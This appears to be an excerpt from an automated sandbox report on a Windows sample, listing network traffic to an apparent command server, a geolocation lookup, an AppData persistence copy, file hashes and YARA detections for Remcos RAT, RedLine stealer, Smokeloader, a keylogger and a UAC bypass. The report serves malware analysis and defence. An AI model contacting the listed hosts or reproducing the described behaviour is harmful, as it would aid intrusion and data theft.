                                                Jan 11, 2025 06:13:34.058995008 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:14:07.308430910 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:14:07.362509012 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:14:07.717538118 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:14:07.722349882 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:14:37.385974884 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:14:37.445533991 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:14:37.920348883 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:14:37.925246954 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:14:50.034863949 CET4982880192.168.2.6178.237.33.50
                                                Jan 11, 2025 06:14:50.503412962 CET4982880192.168.2.6178.237.33.50
                                                Jan 11, 2025 06:14:51.300154924 CET4982880192.168.2.6178.237.33.50
                                                Jan 11, 2025 06:14:52.503423929 CET4982880192.168.2.6178.237.33.50
                                                Jan 11, 2025 06:14:54.987690926 CET4982880192.168.2.6178.237.33.50
                                                Jan 11, 2025 06:14:59.800201893 CET4982880192.168.2.6178.237.33.50
                                                Jan 11, 2025 06:15:07.488765955 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:15:07.534552097 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:15:07.831795931 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:15:07.836707115 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:15:09.467823982 CET4982880192.168.2.6178.237.33.50
                                                Jan 11, 2025 06:15:37.575534105 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:15:37.628644943 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:15:37.942620993 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:15:37.947695971 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:16:07.675929070 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:16:07.722105980 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:16:08.221589088 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:16:08.231725931 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:16:37.782902956 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:16:37.831482887 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:16:38.208163977 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:16:38.213068962 CET3258349753198.23.227.212192.168.2.6

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 11, 2025 06:13:00.475275040 CET5049553192.168.2.61.1.1.1
                                                Jan 11, 2025 06:13:00.483243942 CET53504951.1.1.1192.168.2.6

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jan 11, 2025 06:13:00.475275040 CET192.168.2.61.1.1.10xa87dStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jan 11, 2025 06:13:00.483243942 CET1.1.1.1192.168.2.60xa87dNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • geoplugin.net

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.649828178.237.33.50801512C:\Users\user\AppData\Roaming\xenor\yavascript.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:13:00.498894930 CET71OUTGET /json.gp HTTP/1.1
                                                Host: geoplugin.net
                                                Cache-Control: no-cache
                                                Jan 11, 2025 06:13:01.126374006 CET1171INHTTP/1.1 200 OK
                                                date: Sat, 11 Jan 2025 05:13:01 GMT
                                                server: Apache
                                                content-length: 963
                                                content-type: application/json; charset=utf-8
                                                cache-control: public, max-age=300
                                                access-control-allow-origin: *
                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:00:12:36
                                                Start date:11/01/2025
                                                Path:C:\Users\user\Desktop\yPIOW6yoPi.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\yPIOW6yoPi.exe"
                                                Imagebase:0x400000
                                                File size:397'312 bytes
                                                MD5 hash:A0ACD7920F09A59331E008F8D3DC7AC1
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2295009749.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2295191627.00000000005A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:00:12:38
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1000
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:00:12:40
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1008
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:00:12:41
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1112
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:10
                                                Start time:00:12:42
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1120
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:12
                                                Start time:00:12:43
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1116
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:14
                                                Start time:00:12:44
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1120
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:16
                                                Start time:00:12:45
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1044
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:17
                                                Start time:00:12:46
                                                Start date:11/01/2025
                                                Path:C:\Users\user\AppData\Roaming\xenor\yavascript.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
                                                Imagebase:0x400000
                                                File size:397'312 bytes
                                                MD5 hash:A0ACD7920F09A59331E008F8D3DC7AC1
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.4624113726.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                Antivirus matches:
                                                • Detection: 71%, ReversingLabs
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:19
                                                Start time:00:12:47
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1300
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:20
                                                Start time:00:12:48
                                                Start date:11/01/2025
                                                Path:C:\Users\user\AppData\Roaming\xenor\yavascript.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
                                                Imagebase:0x400000
                                                File size:397'312 bytes
                                                MD5 hash:A0ACD7920F09A59331E008F8D3DC7AC1
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000014.00000002.2309360524.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2309481158.0000000000698000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:22
                                                Start time:00:12:48
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 708
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:24
                                                Start time:00:12:49
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 472
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:26
                                                Start time:00:12:50
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 716
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:29
                                                Start time:00:12:51
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 744
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:31
                                                Start time:00:12:52
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 708
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:34
                                                Start time:00:12:53
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 752
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:37
                                                Start time:00:12:55
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 920
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:38
                                                Start time:00:12:56
                                                Start date:11/01/2025
                                                Path:C:\Users\user\AppData\Roaming\xenor\yavascript.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
                                                Imagebase:0x400000
                                                File size:397'312 bytes
                                                MD5 hash:A0ACD7920F09A59331E008F8D3DC7AC1
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000026.00000002.2378502507.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000026.00000002.2378390823.0000000000748000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
